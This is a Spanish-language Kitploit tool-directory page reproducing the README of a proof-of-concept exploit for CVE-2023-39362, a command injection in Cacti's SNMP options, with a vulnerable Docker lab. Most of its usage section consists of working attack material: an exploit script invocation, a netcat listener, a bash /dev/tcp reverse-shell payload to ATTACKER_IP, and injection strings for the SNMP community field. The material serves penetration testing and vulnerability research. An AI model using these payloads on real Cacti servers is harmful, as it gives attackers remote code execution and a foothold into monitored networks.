Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-39362-cacti-snmp-command-injection-poc — Exploit de prueba de concepto para CVE-2023-39362, una inyección de comandos autenticada en las opciones SNMP de Cacti. Incluye un entorno Docker vulnerable para pruebas y un script Python para explotación automatizada con capacidad de shell inversa. | Kitploit
Herramientas/GitHubGitHub/jakabakos/cve-2023-39362-cacti-snmp-command-injection-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingLabs y Práctica
GitHubjakabakos/cve-2023-39362-cacti-snmp-command-injection-poc

CVE-2023-39362-cacti-snmp-command-injection-poc

Exploit de prueba de concepto para CVE-2023-39362, una inyección de comandos autenticada en las opciones SNMP de Cacti. Incluye un entorno Docker vulnerable para pruebas y un script Python para explotación automatizada con capacidad de shell inversa.

Ver Repositorio
24hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad de inyección de comandos en Cacti (CVE-2023-39362) - PoC

Este repositorio es un fork de este repositorio: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

Cacti es un framework de monitoreo operativo y gestión de fallos de código abierto, en constante evolución para satisfacer las necesidades dinámicas de su comunidad de usuarios.

En la versión 1.2.24, se ha identificado una posible vulnerabilidad de seguridad marcada como CVE-2023-39362. Bajo condiciones específicas, un usuario autenticado con privilegios puede explotar una falla en las opciones de SNMP de un Dispositivo utilizando una cadena maliciosa que conduce a una inyección de comandos. Esta explotación resulta en la ejecución autenticada de código remoto en el servidor subyacente.

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362

Las implicaciones de esta vulnerabilidad son graves, ya que un actor malicioso con privilegios autenticados podría comprometer la integridad del servidor que aloja Cacti. Este compromiso podría servir potencialmente como puerta de entrada para acceso no autorizado a otros hosts dentro de la red, especialmente aquellos monitoreados por Cacti.

Esta es una aplicación vulnerable para probar el exploit de la vulnerabilidad de Cacti (CVE-2023-39362).

¡ADVERTENCIA!

¡Esta aplicación contiene vulnerabilidades de seguridad graves. ¡Úsela bajo su propio riesgo! Se recomienda utilizar un entorno respaldado y protegido (como una máquina virtual con una instantánea reciente y redes solo de host). No cargue esta aplicación en ningún servidor expuesto a Internet, ya que se verán comprometidos.

Descargo de responsabilidad

No me hago responsable de la forma en que alguien use esta aplicación. El único propósito de esta aplicación es ser un escenario de prueba para el exploit de CVE-2023-39362 y no debe usarse de forma maliciosa. Si su servidor se ve comprometido mediante la instalación de esta aplicación, no es mi responsabilidad, sino de la(s) persona(s) que la cargaron e instalaron.**

Uso

1. Configurar el entorno

Aquí los pasos para configurar el entorno:

  1. Ejecute docker compose up -d para iniciar la composición.
  2. Puede finalizar los pasos navegando a http://127.0.0.1/cacti para iniciar el asistente de inicialización de Cacti. Si obtiene un error relacionado con la base de datos, solo espere un poco y actualice la página.
  3. Las credenciales predeterminadas son admin/admin.
  4. Presione "Siguiente" en todos los botones durante el asistente, eligiendo las opciones correspondientes. Todos los valores predeterminados deberían estar bien y todos los requisitos previos obligatorios deberían cumplirse.
  5. Después de la instalación, inicie sesión como admin.
  6. Vaya a "Consola" > "Configuración" > "Usuario".
  7. Haga clic en el usuario guest.
  8. "Habilitar" lo, establezca una contraseña, deshabilite "Debe cambiar la contraseña en el próximo inicio de sesión" si lo desea.
  9. Haga clic en el botón "Guardar".
  10. Vaya a la sección "Permisos".
  11. En "Administración general", habilite "Acceso a la consola" y "Sitios/Dispositivos/Datos".
  12. Haga clic en el botón "Guardar".
  13. Cierre sesión y vuelva a iniciar sesión como guest para probar el exploit.

La guía de instalación oficial de Cacti se puede encontrar aquí.

Para desmontar el entorno use el comando docker compose down.

2. Ejecutar el script de exploit

(Esta es solo una posible ruta de explotación)

Ejecute el comando en el servidor remoto:

root@kitploit:~
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd touch /tmp/proof

Abriendo una reverse shell:

root@kitploit:~
nc -lvnp 4242

python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd 'bash -c "exec bash -i &>/dev/tcp/ATTACKER_IP/PORT <&1"'

3. Explotación manual

  1. Vaya a "Consola" > "Crear" > "Nuevo dispositivo".
  2. Cree un Dispositivo que admita SNMP versión 1 o 2.
  3. Asegúrese de que el Dispositivo tenga Gráficos con una o más plantillas de:
    • "Net-SNMP - Combined SCSI Disk Bytes"
    • "Net-SNMP - Combined SCSI Disk I/O"
    • (Crear el Dispositivo a partir de la plantilla "Net-SNMP Device" satisfará el requisito previo de Gráficos)
  4. En "Opciones SNMP", para el campo "Cadena de comunidad SNMP", use un valor como este: public\' ; touch /tmp/proof ; \'.
  5. Haga clic en el botón "Crear".
  6. Verifique en /tmp la presencia del archivo creado.

Para obtener una reverse shell, se puede usar un payload como el siguiente.

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

Causa raíz

Una causa raíz detallada de la vulnerabilidad está disponible en el aviso de seguridad original o en la entrada del blog del autor original.

Autores

  • Antonio Francesco Sardella - reportante de la vulnerabilidad - m3ssap0
  • Akos Jakab - automatizar la explotación mediante un script de Python - jakabakos

Licencia

Este proyecto está licenciado bajo la Unlicense - consulte el archivo LICENSE para obtener más detalles.

Descargar herramienta